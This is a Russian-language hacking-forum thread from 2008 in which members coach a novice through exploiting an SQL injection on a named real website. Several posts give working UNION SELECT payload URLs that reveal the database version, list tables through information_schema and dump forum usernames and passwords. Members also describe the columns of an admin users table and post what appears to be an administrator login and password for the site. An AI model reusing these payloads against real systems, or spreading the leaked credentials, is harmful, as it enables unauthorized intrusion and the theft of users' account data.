HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.06.2008, 00:59
JoN.SmiT
Новичок
Регистрация: 07.05.2008
Сообщений: 9
С нами: 9479722

Репутация: -1
По умолчанию

А что мне делать со слипой скуляй?

и где взять скрипт с выводом если не секрет?
 
Ответить с цитированием

  #2  
Старый 16.06.2008, 01:00
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами: 10172486

Репутация: 874
По умолчанию

Не слепая!!!!
Открой исходный код страницы и поищи поля 3,4,5,6. Вывод в них
Вот пример
http://www.modvlad.ru/photo/?g=-1+union+select+111,222,version(),444,555,666/*
ищем в коде 444, и рядом видим версию 5.0.45-log
 
Ответить с цитированием

  #3  
Старый 16.06.2008, 01:08
JoN.SmiT
Новичок
Регистрация: 07.05.2008
Сообщений: 9
С нами: 9479722

Репутация: -1
По умолчанию

ага нашел! А как теперь сформировать запрос на вывод таблицы?
 
Ответить с цитированием

  #4  
Старый 16.06.2008, 01:10
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
С нами: 10485026

Репутация: 1879


По умолчанию

Запрос из базы только Лимитом(!!!) Попробовал вывести всё... опера всю оперативу скушала...
 
Ответить с цитированием

  #5  
Старый 16.06.2008, 01:14
JoN.SmiT
Новичок
Регистрация: 07.05.2008
Сообщений: 9
С нами: 9479722

Репутация: -1
По умолчанию

(= ведь это журнал! там новерное одана таблица те оперу села какя нить пост с кучей новостей типа архива или ещё чё нить!
А вот например как мне просканить на таблицу юзер?
 
Ответить с цитированием

  #6  
Старый 16.06.2008, 01:15
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами: 10188506

Репутация: 861


По умолчанию

Велемир, терпение надо иметь, а не пытаца найти легкий путь В крайнем случае написать граббер если не хватает терпения 38 таблиц ручками прочекать. И это при том, что первые 16 - системные
 
Ответить с цитированием

  #7  
Старый 16.06.2008, 01:22
JoN.SmiT
Новичок
Регистрация: 07.05.2008
Сообщений: 9
С нами: 9479722

Репутация: -1
По умолчанию

А чёза это кмс?

и как Лимитом запос мутить?

Последний раз редактировалось Constantine; 16.06.2008 в 01:54.. Причина: флейм
 
Ответить с цитированием

  #8  
Старый 16.06.2008, 01:31
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
С нами: 10485026

Репутация: 1879


По умолчанию

Там есть таблица be_users. В ней поля:
-uid
-pid
-tstamp
-username
-password
-admin
-usergroup
-email
И ещё до*** и больше. Вот и вытаскивай.
 
Ответить с цитированием

  #9  
Старый 16.06.2008, 01:37
JoN.SmiT
Новичок
Регистрация: 07.05.2008
Сообщений: 9
С нами: 9479722

Репутация: -1
По умолчанию

Покажи запрос плиз
что после http://www.modvlad.ru/photo/?g=-1+union+select+111,222,version(),444,555,666/*
http://www.modvlad.ru/photo/?g=37+union+select+table_name,2,3,4,5,6+from+infor %20mation_schema.tables+limit+38,1/* делал мне для себя надо знать
и как тащить и я вас больше не потревожу! в формате http:// к примеру username плиз оч надо для обучения!

Последний раз редактировалось JoN.SmiT; 16.06.2008 в 01:43..
 
Ответить с цитированием

  #10  
Старый 16.06.2008, 01:44
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами: 10172486

Репутация: 874
По умолчанию

На форум
Логин Administrator
Пароль simbol
Есть админка, но в какой таблице пароли хз

Вот тебе запрос для вывода данных юзеров из форума
http://www.modvlad.ru/photo/?g=-1+union+select+111,222,username,user_password,555, 666+from+forum_users/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.